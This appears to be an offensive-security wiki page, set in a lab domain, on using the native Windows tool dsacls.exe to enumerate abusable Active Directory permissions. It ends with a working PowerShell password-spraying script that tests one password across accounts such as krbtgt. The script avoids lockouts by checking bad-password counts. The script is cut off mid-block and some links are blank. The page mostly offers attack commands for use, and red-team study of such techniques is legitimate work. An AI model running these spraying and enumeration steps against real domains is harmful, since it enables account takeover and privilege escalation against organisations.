description |
Enumeration, living off the land |
It is possible to use a native windows binary (in addition to powershell cmdlet Get-Acl
) to enumerate Active Directory object security persmissions. The binary of interest is dsacls.exe
Dsacls allows us to display or modify permissions (ACLS) of an Active Directory Domain Services (AD DS).
Let's check if user spot
has any special permissions against user's spotless
AD object:
{% code title="attacker@victim" %}
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
{% endcode %}
Nothing useful:
Let's give user spot Reset Password
and Change Password
permissions on spotless
AD object:
...and try the command again:
{% code title="attacker@victim" %}
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
{% endcode %}
All well known (and abusable) AD object permissions should be sought here. One of them is FULL CONTROL
{% code title="attacker@victim" %}
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "full control"
{% endcode %}
{% code title="attacker@victim" %}
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" | select-string "spotless"
{% endcode %}
Enumerating AD object permissions this way does not come in a nice format that can be piped between powershell cmd-lets, but it's still something to keep in mind if you do not the ability to use tools like powerview or ActiveDirectory powershell cmdlets or if you are trying to LOL
For more good privileges to be abused:
{% page-ref page="" %}
{% page-ref page="" %}
As a side note, the dsacls
binary could be used to do LDAP password spraying as it allows us to bind to an LDAP session with a specified username and password:
{% code title="incorrect logon" %}
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:1234567
{% endcode %}
{% code title="correct logon" %}
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:123456
{% endcode %}
{% code title="attacker@victim" %}
$domain = ((cmd /c set u)[-3] -split "=")[-1]
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
$password = "123456"
# (Get-Content users.txt)
"krbtgt","spotless" | % {
$badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
$isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:$_@offense.local /passwd:$password | select-string -pattern "Invalid Credentials"
if ($isInvalid -match "Invalid") {
Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
} else {
Write-Host "[+] Working Credentials for $_ : $password" -foreground green
{% endcode %}
{% embed url="" %}